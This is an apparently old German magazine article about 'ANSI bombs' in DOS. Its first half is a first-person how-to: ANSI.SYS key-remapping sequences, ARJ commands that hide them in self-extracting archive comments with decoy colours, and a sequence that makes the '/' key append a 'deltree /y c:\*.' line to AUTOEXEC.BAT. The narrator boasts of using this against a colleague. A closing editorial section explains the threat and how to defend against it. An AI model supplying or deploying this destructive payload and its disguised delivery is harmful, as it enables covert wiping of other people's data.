Schräge Belegungen: Es gibt immer noch Menschen mit DOS. Und für diese Unverbesserlichen ist ein Ansi-Treiber wie ANSI.SYS ein fast standardmäßig eingesetztes Hilfsmittel, um die karge Kommandozeile mit etwas Farbe aufzupeppen. In der Tat bringen die kryptischen Ansi-Sequenzen jede Menge Farbe ins Leben der Mitmenschen, wenn ich sie für schräge Tastenbelegungen verwende:[13; 8; 13; 13pIn diesem Fall erhält die -Taste (Ascii 13) einen eingebauten Rückschritt (Ascii 8) verpaßt, was die normale Eingabe fantasievoller gestaltet. Raffiniert schräge Belegungen: Da aber bei solchen Anschlägen stets die Gefahr besteht, daß die so geneppten Mitmenschen einen Zusammenhang mit früheren Ansi-Ärgernissen herstellen, packe ich meine Ansi-Bomben bevorzugt in selbstextrahierende EXE-Archive. Leider schaltet das Komprimierprogramm Pkunzip heutzutage die Ansi-Kommentare standardmäßig ab. Doch mit der Komprimieralternative ARJ ist es nach wie vor möglich, selbstextrahierende EXE-Archive so zu erstellen, daß sie beim Entpacken unerwünschte Ansi-Belegungen an den Mann (die Frau) bringen: Ich lege also erst einmal ein normales Archiv an (arj a arch *. pcx), dann füge ich mitarj c arch -zcomment. datden Ansi-Kommentar COMMENT.DAT hinzu und verwandle das Archiv anschließend mit "arj y -je1 -ja arch" in eine EXE-Datei, wobei die Ansi-Kommentare mit dem Schalter "-ja" explizit aktiviert werden müssen. Wie die Escape-Sequenzen in meiner COMMENT.DAT auszusehen haben, steht in jedem DOS-Handbuch: Ich kombiniere stets zur besseren Tarnung einige farbenfrohe Escape-Kommandos mit dem bewußten Tastaturbelegungsbefehl, auf den es mir eigentlich ankommt. Extrem gefährliche Belegungen: Wer die von mir angelegten Archive entpackt, bekommt einige nette bunte Zeilen serviert, zusätzlich aber auch eine weniger nette Ansi-Sequenz wie zum Beispiel die folgende:["/";13;"echo deltree /y c:\*. >> c:\autoexec.bat";13;"cls";13;13pWenn der Betroffene danach die Taste "/" drückt, schreibt die Bombe eine letale Zeile in seine AUTOEXEC.BAT, die dann beim nächsten Systemstart seineVerzeichnisse beseitigt. Beim Kollegen W. wollte ich bei diesem Zerstörungswerk lieber auf Nummer Sicher gehen, und so habe ich den Vernichtungsbefehl direkt mit einer bestimmten Taste verknüpft -also ohne den Umweg über die Startdatei. Wie Sie sich wehren -Kommentar der Redaktion Ansi-Bomben können durch Tastatur-Umbelegungen verheerende Schäden anrichten. In der Regel belegt der Attentäter eine ganz normale Taste, eine Funktionstaste oder auch die -Taste mit einem oder mehreren vernichtenden DOS-Befehlen. Diese Tastaturdefinition gilt ausschließlich für den DOS-Prompt.Ansi-Bomben zielen fast immer auf den Totalschaden. Zwar kann der Bombenleger wie in einer Batchdatei mehrere DOS-Befehle absetzen, aber die Begrenzung auf maximal 127 Zeichen innerhalb einer DOS-Zeile läßt praktisch nur Vernichtung zu. Theoretisch kann jede beliebige Ascii-Datei Ansi-Bomben enthalten. Da diese allerdings nur durch den antiquierten TYPE-Befehl aktiviert würden, gibt es kaum Hacker, die ihre Anschläge auf diesem Weg zu verüben suchen. Gepackte Archive mit integrierten Ansi-Kommentaren erweisen sich als weitaus zuverlässigere Bombenträger. Diese Kommentare werden beim Entpacken automatisch gelesen: Im Normalfall enthalten sie bunte Mailbox-Logos oder farbige Absender-Adressen, theoretisch aber auch die berüchtigten Bomben. Insbesondere selbstextrahierenden EXE-Archiven, die zunächst einen Farbkommentar abrufen, sollten Sie mit Vorsicht begegnen. TIP: Sicher vor Ansi-Bomben sind Sie, wenn Sie den Treiber ANSI.SYS erst gar nicht installiert haben. Praktisch genauso sicher sind Sie auch mit installiertem ANSI.SYS, wenn Sie nach dem Entpacken sofort den Rechner neu starten beziehungsweise unter Windows oder OS/ 2 sofort die DOS-Box schließen, in der Sie das Archiv entpackt haben. So schließen Sie definitiv aus, daß Sie auf eine Tastenmine treten, weil Ansi-Belegungen nur für die lokale DOS-Box gelten.

Add Comment

* Required information
1000
Drag & drop images (max 1)
Powered by Commentics

Comments

No comments yet. Be the first!

Deprecated: Directive 'allow_url_include' is deprecated in Unknown on line 0